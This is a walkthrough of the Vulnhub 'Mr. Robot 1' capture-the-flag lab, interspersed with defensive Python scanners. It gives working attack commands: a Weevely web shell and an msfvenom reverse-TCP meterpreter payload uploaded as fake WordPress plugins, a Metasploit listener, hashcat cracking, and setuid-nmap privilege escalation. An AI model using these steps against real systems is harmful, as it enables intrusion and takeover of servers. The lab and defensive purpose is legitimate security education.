Today I am taking a look at a Vulnhub VM based on the show Mr. Robot. Coincidentally, the name of the VM is Mr. Robot 1. The goal is to find three keys hidden in different locations. Things get progressively more difficult as you hunt down the keys. This game is considered beginner-intermediate, and you don’t have to do anything hardcore to beat it.

Let’s start, shall we?

Test lab environment

When playing games such as this I use my own test lab. I’ve been using VMware and Kali Linux for years. Due to hardware and software issues I decided to switch everything out in favor of VirtualBox and Parrot OS. I’ll do the hacking part from Parrot exclusively. I recommend setting up a similar environment before playing.

Walkthrough

Finding the most basic information

The very first thing I had to do was to uncover the target’s IP address. Luckily my test lab has only a few machines in it, so finding the target was a breeze using this command:

$ netdiscover

Key 1

Finding open ports

I knew very little about this target. A great way to learn more about a target is to have a look at which ports are open using Nmap:

$ nmap -p1-65535 -A -T4 -sS -sU target_ip

Nmap found out that ports 80 and 443 were open.

Investigating the web environment

Still not knowing much about the target, I needed to find out more. Better make use of Nikto, which is a great tool for learning more about the target’s web environment:

$ nikto -output MrRobot.xml -host target_ip

From Nikto’s output I learnt that:

  • WordPress is installed on the server
  • license.txt is present
  • robots.txt is present
  • … and the server runs Apache

Those .txt files looked pretty interesting, so I downloaded them for closer inspection:

$ wget http://target_ip/license.txt
$ wget http://target_ip/robots.txt

Investigating license.txt

This file had a Base64 encoded string in it. I quickly decoded it while still in the terminal:

$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode

String decodes to elliot:ER28-0652.
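The license.txt finding above is a classic credential leak: a user:password pair tucked into a world-readable file as base64. As an added example (not part of the original walkthrough), here is a small defender-side check that scans the text files a web root serves for base64 tokens that decode to such a pair, so the leak is caught in a review or CI job before an attacker downloads it. The function and constant names, the token-length threshold and the credential pattern are all my own assumptions; the sample text is constructed and only reuses the string shown above.

```python
import base64
import binascii
import re

# Runs of base64-alphabet characters long enough to be worth decoding; shorter
# runs appear in ordinary English and would only produce noise (threshold assumed).
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# What a leaked "user:password" line usually looks like once decoded (assumed shape).
CREDENTIAL = re.compile(r"^([A-Za-z0-9._-]+):(\S+)$")


def decode_if_base64(token):
    """Return the decoded text, or None when the token is not clean base64 UTF-8 text."""
    if len(token) % 4:
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_encoded_credentials(text):
    """Return (username, password) pairs hidden as base64 anywhere in text."""
    found = []
    for match in BASE64_TOKEN.finditer(text):
        decoded = decode_if_base64(match.group(0))
        if decoded is None:
            continue
        pair = CREDENTIAL.match(decoded.strip())
        if pair:
            found.append((pair.group(1), pair.group(2)))
    return found


def scan_files(paths):
    """Map each file path to the credential pairs found in it (empty list if none)."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            report[path] = find_encoded_credentials(fh.read())
    return report


if __name__ == "__main__":
    # Constructed sample standing in for a downloaded license.txt.
    sample = (
        "WordPress - Web publishing software\n"
        "... many lines of GPL text ...\n"
        "ZWxsaW90OkVSMjgtMDY1Mgo=\n"
    )
    for user, password in find_encoded_credentials(sample):
        print(f"possible leaked credential: user={user!r} password={password!r}")
```

Point `scan_files` at everything under the document root that is served as plain text (robots.txt, license.txt, readme files, backups) and treat any hit as a finding to remove and rotate; the decoded line in this VM would have shown up immediately.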

Investigating robots.txt

This file contained two interesting entries. First, the key to level 1. Second, a dictionary of some sort. Downloading them both for later use:

$ wget http://target_ip/fsociety.dic
$ wget http://target_ip/key-1-of-3.txt

Key 1 retrieved!

Key 2

WPScan

Finding basic information about the WordPress installation using WPScan:

$ wpscan --url target_ip

This yielded:

  • robots.txt (which I had already downloaded)
  • the WordPress version

Enumerating users

Trying to enumerate the WordPress users:

$ wpscan --enumerate u[0-10000] --url target_ip

This yielded no results, and neither did trying the username elliot directly (which I found earlier).

Enumerating plugins

Plugins are a great source of ways in, and they often leak interesting information too. Enumerating lets me find out which plugins the site uses:

$ wpscan --url target_ip --enumerate p

WPScan spat out plenty of useful information and, frankly, I wasn’t in the mood to go any further with it. Instead I went on to log in with the credentials elliot:ER28-0652 at wp-login – instant success!

Logged in

Looked around. It’s a plain WordPress installation. Decided to try getting shell. Being closer to core is more interesting.

Shell

The first thing that struck me was that a shell made using Weevely would be killer!

$ weevely generate 12345 shelly.php

The plan is to sneak the shell onto the server by using the plugin installation tool in WordPress. In order to do so, the shell must be prepped to appear as a proper plugin. Adding WordPress plugin header comments at the beginning of shelly.php:

<?php

/*
Plugin Name: Shelly
Plugin URI: http://localhost
Description: Bla Bla Bla
Author: Pingmoose
Version: 1.0.1
Author URI: http://localhost
*/

... PHP_SHELL_CODE ...

?>

Making it a plugin package for WordPress’s plugin installation tool by zipping it:

$ zip shelly.zip shelly.php

Then installed it through the WordPress plugin installer. After that, connected Weevely to the shell:

$ weevely http://target_ip/wp-content/plugins/shelly/shelly.php 12345
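The trick in the steps above is that WordPress only checks for a plugin header, not for what the PHP actually does, so any admin credential becomes code execution. As an added example written from the defender’s side (not code from the original post), here is an inspector for a plugin archive that records the declared plugin name and flags PHP lines with the shapes a disguised shell tends to have: direct calls to execution functions and the decode-then-execute pattern. The function names, the regular expressions and the `build_zip` helper are my own assumptions, and the archives in the test are constructed samples.

```python
import io
import re
import zipfile

# PHP calls that have no business in a plugin uploaded through the admin UI.
# Constructed list for this example; extend it from your own review findings.
RISKY_CALLS = re.compile(
    r"\b(eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(",
    re.IGNORECASE,
)
# Decoding immediately followed by execution is the usual obfuscated-shell shape.
DECODE_THEN_RUN = re.compile(
    r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
# The one header line WordPress requires to treat a file as a plugin.
PLUGIN_HEADER = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+)$", re.MULTILINE)


def build_zip(files):
    """Constructed helper: pack {archive_path: php_source} into zip bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, source in files.items():
            zf.writestr(name, source)
    return buf.getvalue()


def inspect_plugin_zip(data):
    """Return {'plugin_name', 'php_files', 'findings'} for a plugin archive given as bytes."""
    report = {"plugin_name": None, "php_files": 0, "findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".php"):
                continue
            report["php_files"] += 1
            source = zf.read(info).decode("utf-8", errors="replace")
            header = PLUGIN_HEADER.search(source)
            if header and report["plugin_name"] is None:
                report["plugin_name"] = header.group(1).strip()
            for lineno, line in enumerate(source.splitlines(), 1):
                if DECODE_THEN_RUN.search(line):
                    report["findings"].append((info.filename, lineno, "decode-then-execute"))
                    continue
                hit = RISKY_CALLS.search(line)
                if hit:
                    label = "dangerous call: " + hit.group(1).lower()
                    report["findings"].append((info.filename, lineno, label))
    return report


def is_suspicious(report):
    """Any finding means a human should read the file before it is activated."""
    return bool(report["findings"])


if __name__ == "__main__":
    # Constructed sample: a valid header wrapped around one decode-then-execute line.
    sample = build_zip({"shelly/shelly.php": "<?php\n/*\nPlugin Name: Shelly\n*/\n$p = 'x';\neval(base64_decode($p));\n"})
    print(inspect_plugin_zip(sample))
```

This is a heuristic, not a proof of safety; the real fix is to keep plugin uploads off production (`define('DISALLOW_FILE_MODS', true);` in wp-config.php disables the installer and editor), and to alert on any new directory appearing under wp-content/plugins.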

While in shell:

$ cd /home
$ ls
$ cd /home/robot
$ ls

This led to the discovery of key-2-of-3.txt. I couldn’t read it due to missing permissions. However, a file named password.raw-md5 in this directory was readable.

Cracking password.raw-md5

The filename clearly stated I had to deal with an MD5 hash. I could have gone lazy and used rainbow tables on this one; there was a good chance it had already been cracked. But that would be too easy, wouldn’t it? Instead I chose to crack it using the RockYou wordlist and the magnificent Hashcat tool.

$ cp /usr/share/wordlists/rockyou.txt.gz Hacking/
$ gunzip Hacking/rockyou.txt.gz
$ hashcat -m 0 -a 0 key2passwordhash.txt ~/Hacking/rockyou.txt

Maybe I could su - robot using this password. Nope, my shell couldn’t handle that … I needed a better one.

Creating a second shell

Trying the Metasploit and MSFVenom route. Listed options in MSFVenom in Parrot:

$ msfvenom -l | grep php

Creating shell:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=my_ip LPORT=7771 -f raw -o meterpreter.php

Added WordPress headers, zipped it and installed it – the same routine as earlier.

Listener setup in Metasploit:

$ msfconsole
$ use exploit/multi/handler
$ set LHOST my_ip
$ set LPORT 7771
$ run

In order to make the shell connect back to my attacking computer I had to manually visit:

http://target_ip/wp-content/plugins/meterpreter/meterpreter.php

Back in Metasploit:

$ shell

Then spawn a shell so I could do more work (typed directly into Metasploit):

$ python -c 'import pty;pty.spawn("/bin/bash")'

Waited for the shell to come alive, then switched to robot using the password I cracked from the MD5 file:

$ cd /home/robot
$ su - robot
$ cat Key-2-of-3.txt

Success!

Key 3

Still in my spawned shell, I tried to find a way to become root.

Finding programs that can be used for escalation

$ find / -perm /6000 2> /dev/null

Found an old version of Nmap. Trying to exploit its interactive mode:

$ /usr/local/bin/nmap --interactive
$ !sh
$ whoami
$ cd /root; ls;
$ cat Key-3-of-3.txt
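The root key fell out of a setuid binary that did not belong on the box: an old Nmap with an interactive mode, found with the `find / -perm /6000` listing above. As an added example (my own code, not the walkthrough’s), here is the same listing turned into an audit that compares every setuid/setgid file against a known-good baseline and reports anything extra, which is how a defender would have caught `/usr/local/bin/nmap` before it was needed. The baseline set, the skipped directories and the function names are assumptions for this example; the entries in the test are constructed.

```python
import os
import stat

# Binaries that are legitimately setuid/setgid on a typical Debian-style host.
# Constructed baseline for this example; generate yours from a clean golden image.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/wall", "/usr/bin/ssh-agent",
}
# Pseudo-filesystems where the mode bits are meaningless for this purpose.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def has_suid_or_sgid(mode):
    """True when the setuid or setgid bit is set (the same test as find's -perm /6000)."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def audit_entries(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode) with file-type bits included.

    Returns the sorted list of regular files that carry setuid/setgid and are
    not in the baseline. Symlinks and directories are ignored on purpose.
    """
    unexpected = []
    for path, mode in entries:
        if stat.S_ISREG(mode) and has_suid_or_sgid(mode) and path not in baseline:
            unexpected.append(path)
    return sorted(unexpected)


def walk_modes(root="/"):
    """Yield (path, st_mode) for every regular file under root, pruning pseudo-filesystems."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so a symlink is judged by itself, not its target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


if __name__ == "__main__":
    for path in audit_entries(walk_modes("/")):
        print("unexpected setuid/setgid file:", path)
```

Run it from a cron job or configuration-management check and treat any output as a change to investigate; removing the bit (`chmod u-s,g-s`) or the stray binary closes this class of escalation regardless of which program happens to carry it.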

Challenge done!
